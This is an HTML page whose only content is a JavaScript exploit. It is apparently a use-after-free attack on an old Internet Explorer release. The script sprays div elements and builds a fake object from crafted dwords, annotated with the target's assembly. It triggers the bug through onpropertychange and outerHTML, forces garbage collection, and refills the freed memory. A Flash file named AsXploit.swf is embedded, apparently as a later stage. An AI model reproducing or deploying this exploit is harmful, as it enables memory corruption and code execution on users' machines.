&lt;html&gt;
&lt;head&gt;
&lt;/head&gt;
&lt;body&gt;
 
&lt;script&gt;
 
var g_arr = [];
var arrLen = 0x250;
 
function dword2data(dword)
{
    var d = Number(dword).toString(16);
    while (d.length &lt; 8)
        d = &#39;0&#39; + d;
 
    return unescape(&#39;%u&#39; + d.substr(4, 8) + &#39;%u&#39; + d.substr(0, 4));
}
 
function eXpl()
{
    var a=0;
 
    for (a=0; a &lt; arrLen; a++) {
        g_arr[a] = document.createElement(&#39;div&#39;);
    }
     
    // Build a new object
    var b = dword2data(0x19fffff3);
    while (b.length &lt; 0x360)
    {
        // mov     eax,dword ptr [esi+98h]
        // ...
        // mov     eax,dword ptr [eax+8]
        // and     dword ptr [eax+2F0h],0FFFFFFBFh
        if (b.length == (0x98 / 2))
        {
            b += dword2data(0x1a000010);
        }
        // mov     ecx,dword ptr [edx+94h]
        // mov     eax,dword ptr [ecx+0Ch]
        else if (b.length == (0x94 / 2))
        {
            b += dword2data(0x1a111111);
        }
        // mov     eax,dword ptr [edx+15Ch]
        // mov     ecx,dword ptr [eax+edx*8]
        else if (b.length == (0x15c / 2))
        {
            b += dword2data(0x42424242);
        }
        else
        {
            b += dword2data(0x19fffff3);
        }
    }
     
    var d = b.substring(0, ( 0x340 - 2 )/2);
     
    // trigger
    try{
        this.outerHTML=this.outerHTML
    }
    catch(e){
         
    }
     
    CollectGarbage();
 
    // Replace freed object
    for (a=0; a &lt; arrLen; a++)
    {
        g_arr[a].title = d.substring(0, d.length);
    }
}
 
// Trigger the vulnerability
function trigger()
{
    var a = document.getElementsByTagName(&quot;script&quot;);
    var b = a[0];
    b.onpropertychange = eXpl;
    var c = document.createElement(&#39;SELECT&#39;);
    c = b.appendChild(c);
}
 
 
 
&lt;/script&gt;
&lt;embed src=AsXploit.swf width=&quot;10&quot; height=&quot;10&quot;&gt;&lt;/embed&gt;
&lt;/body&gt;
&lt;/html&gt;
